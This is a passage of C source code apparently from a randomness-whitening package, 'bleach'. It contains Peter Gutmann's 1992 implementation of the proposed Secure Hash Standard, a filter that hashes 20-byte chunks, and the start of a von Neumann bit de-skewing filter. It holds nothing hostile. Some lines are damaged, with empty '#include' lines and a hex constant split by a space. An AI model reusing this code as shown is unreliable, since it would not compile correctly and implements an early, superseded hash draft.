temp; \ } /* The two buffers of 5 32-bit words */ LONG h0, h1, h2, h3, h4; LONG A, B, C, D, E; local void byteReverse OF((LONG *buffer, int byteCount)); void shsTransform OF((SHS_INFO *shsInfo)); /* Initialize the SHS values */ void shsInit (shsInfo) SHS_INFO *shsInfo; { /* Set the h-vars to their initial values */ shsInfo->digest [0] = h0init; shsInfo->digest [1] = h1init; shsInfo->digest [2] = h2init; shsInfo->digest [3] = h3init; shsInfo->digest [4] = h4init; /* Initialise bit count */ shsInfo->countLo = shsInfo->countHi = 0L; } /* * Perform the SHS transformation. Note that this code, like MD5, seems to * break some optimizing compilers - it may be necessary to split it into * sections, eg based on the four subrounds */ void shsTransform (shsInfo) SHS_INFO *shsInfo; { LONG W [80], temp; int i; /* Step A. Copy the data buffer into the local work buffer */ for (i = 0; i < 16; i++) W [i] = shsInfo->data [i]; /* Step B. Expand the 16 words into 64 temporary data words */ expand (16); expand (17); expand (18); expand (19); expand (20); expand (21); expand (22); expand (23); expand (24); expand (25); expand (26); expand (27); expand (28); expand (29); expand (30); expand (31); expand (32); expand (33); expand (34); expand (35); expand (36); expand (37); expand (38); expand (39); expand (40); expand (41); expand (42); expand (43); expand (44); expand (45); expand (46); expand (47); expand (48); expand (49); expand (50); expand (51); expand (52); expand (53); expand (54); expand (55); expand (56); expand (57); expand (58); expand (59); expand (60); expand (61); expand (62); expand (63); expand (64); expand (65); expand (66); expand (67); expand (68); expand (69); expand (70); expand (71); expand (72); expand (73); expand (74); expand (75); expand (76); expand (77); expand (78); expand (79); /* Step C. Set up first buffer */ A = shsInfo->digest [0]; B = shsInfo->digest [1]; C = shsInfo->digest [2]; D = shsInfo->digest [3]; E = shsInfo->digest [4]; /* Step D. Serious mangling, divided into four sub-rounds */ subRound1 (0); subRound1 (1); subRound1 (2); subRound1 (3); subRound1 (4); subRound1 (5); subRound1 (6); subRound1 (7); subRound1 (8); subRound1 (9); subRound1 (10); subRound1 (11); subRound1 (12); subRound1 (13); subRound1 (14); subRound1 (15); subRound1 (16); subRound1 (17); subRound1 (18); subRound1 (19); subRound2 (20); subRound2 (21); subRound2 (22); subRound2 (23); subRound2 (24); subRound2 (25); subRound2 (26); subRound2 (27); subRound2 (28); subRound2 (29); subRound2 (30); subRound2 (31); subRound2 (32); subRound2 (33); subRound2 (34); subRound2 (35); subRound2 (36); subRound2 (37); subRound2 (38); subRound2 (39); subRound3 (40); subRound3 (41); subRound3 (42); subRound3 (43); subRound3 (44); subRound3 (45); subRound3 (46); subRound3 (47); subRound3 (48); subRound3 (49); subRound3 (50); subRound3 (51); subRound3 (52); subRound3 (53); subRound3 (54); subRound3 (55); subRound3 (56); subRound3 (57); subRound3 (58); subRound3 (59); subRound4 (60); subRound4 (61); subRound4 (62); subRound4 (63); subRound4 (64); subRound4 (65); subRound4 (66); subRound4 (67); subRound4 (68); subRound4 (69); subRound4 (70); subRound4 (71); subRound4 (72); subRound4 (73); subRound4 (74); subRound4 (75); subRound4 (76); subRound4 (77); subRound4 (78); subRound4 (79); /* Step E. Build message digest */ shsInfo->digest [0] += A; shsInfo->digest [1] += B; shsInfo->digest [2] += C; shsInfo->digest [3] += D; shsInfo->digest [4] += E; } local void byteReverse (buffer, byteCount) LONG *buffer; int byteCount; { LONG value; int count; /* * Find out what the byte order is on this machine. * Big endian is for machines that place the most significant byte * first (eg. Sun SPARC). Little endian is for machines that place * the least significant byte first (eg. VAX). * * We figure out the byte order by stuffing a 2 byte string into a * short and examining the left byte. '@' = 0x40 and 'P' = 0x50 * If the left byte is the 'high' byte, then it is 'big endian'. * If the left byte is the 'low' byte, then the machine is 'little * endian'. * * -- Shawn A. Clifford (sac@eng.ufl.edu) */ /* * Several bugs fixed -- Pat Myrto (pat@rwing.uucp) */ if ((*(unsigned short *) ("@P") >> 8) == '@') return; byteCount /= sizeof (LONG); for (count = 0; count < byteCount; count++) { value = (buffer [count] << 16) | (buffer [count] >> 16); buffer [count] = ((value & 0xFF00FF00L) >> 8) | ((value & 0x00F F00FFL) << 8); } } /* * Update SHS for a block of data. This code assumes that the buffer size is * a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot more * efficient since it does away with the need to handle partial blocks * between calls to shsUpdate() */ void shsUpdate (shsInfo, buffer, count) SHS_INFO *shsInfo; BYTE *buffer; int count; { /* Update bitcount */ if ((shsInfo->countLo + ((LONG) count << 3)) < shsInfo->countLo) shsInfo->countHi++; /* Carry from low to high bitCount */ shsInfo->countLo += ((LONG) count << 3); shsInfo->countHi += ((LONG) count >> 29); /* Process data in SHS_BLOCKSIZE chunks */ while (count >= SHS_BLOCKSIZE) { memcpy (shsInfo->data, buffer, SHS_BLOCKSIZE); byteReverse (shsInfo->data, SHS_BLOCKSIZE); shsTransform (shsInfo); buffer += SHS_BLOCKSIZE; count -= SHS_BLOCKSIZE; } /* * Handle any remaining bytes of data. * This should only happen once on the final lot of data */ memcpy (shsInfo->data, buffer, count); } void shsFinal (shsInfo) SHS_INFO *shsInfo; { int count; LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi; /* Compute number of bytes mod 64 */ count = (int) ((shsInfo->countLo >> 3) & 0x3F); /* * Set the first char of padding to 0x80. * This is safe since there is always at least one byte free */ ((BYTE *) shsInfo->data) [count++] = 0x80; /* Pad out to 56 mod 64 */ if (count > 56) { /* Two lots of padding: Pad the first block to 64 bytes */ memset ((BYTE *) shsInfo->data + count, 0, 64 - count); byteReverse (shsInfo->data, SHS_BLOCKSIZE); shsTransform (shsInfo); /* Now fill the next block with 56 bytes */ memset (shsInfo->data, 0, 56); } else /* Pad block to 56 bytes */ memset ((BYTE *) shsInfo->data + count, 0, 56 - count); byteReverse (shsInfo->data, SHS_BLOCKSIZE); /* Append length in bits and transform */ shsInfo->data [14] = highBitcount; shsInfo->data [15] = lowBitcount; shsTransform (shsInfo); byteReverse (shsInfo->data, SHS_DIGESTSIZE); } <--> <++> bleach/sha/shs.h /* --------------------------------- SHS.H ------------------------------- */ /* * NIST proposed Secure Hash Standard. * * Written 2 September 1992, Peter C. Gutmann. * This implementation placed in the public domain. * * Comments to pgut1@cs.aukuni.ac.nz */ /* Useful defines/typedefs */ #ifndef SHS_H #define SHS_H typedef unsigned char BYTE; typedef unsigned long LONG; /* The SHS block size and message digest sizes, in bytes */ #define SHS_BLOCKSIZE 64 #define SHS_DIGESTSIZE 20 /* The structure for storing SHS info */ typedef struct { LONG digest [5]; /* Message digest */ LONG countLo, countHi; /* 64-bit bit count */ LONG data [16]; /* SHS data buffer */ } SHS_INFO; /* Turn off prototypes if requested */ #if (defined(NOPROTO) && defined(PROTO)) # undef PROTO #endif /* Used to remove arguments in function prototypes for non-ANSI C */ #ifdef PROTO # define OF(a) a #else /* !PROTO */ # define OF(a) () #endif /* ?PROTO */ #define local static void shsInit OF((SHS_INFO *shsInfo)); void shsUpdate OF((SHS_INFO *shsInfo, BYTE *buffer, int count)); void shsFinal OF((SHS_INFO *shsInfo)); #endif <--> <++> bleach/sha_distill.c #include #include "sha/shs.h" main () { SHS_INFO shsInfo; unsigned char c[20]; while (fread(c, 1,20,stdin) == 20) { shsInit(&shsInfo); shsUpdate(&shsInfo,c,20); shsFinal(&shsInfo); fwrite(&shsInfo,1,20,stdout); } } <--> <++> bleach/transmap.c /* Implementation of von Neumann's transistion mapping scheme to de-skew a series of random bits. See 5.2.2 of RFC1750 for more information. */ #include char reconstruct_byte(char *byte_ary); main () { char c, b1, b2, i, j; char byte[7]; j=0; while ( !feof(stdin) ) { fread(&c, 1,1,stdin); for (i=7; i>=0; i-=2) { b1=((c>>i)&1); /* integer representation of bit i */ b2=((c>>(i-1))&1); if ( (b1==1) && (b2==0) ) /* translation of 10 */ { byte[j]=1; j++; } if ( (b1==0) && (b2==1) ) /* translation of 01 */ { byte[j]=0; j++;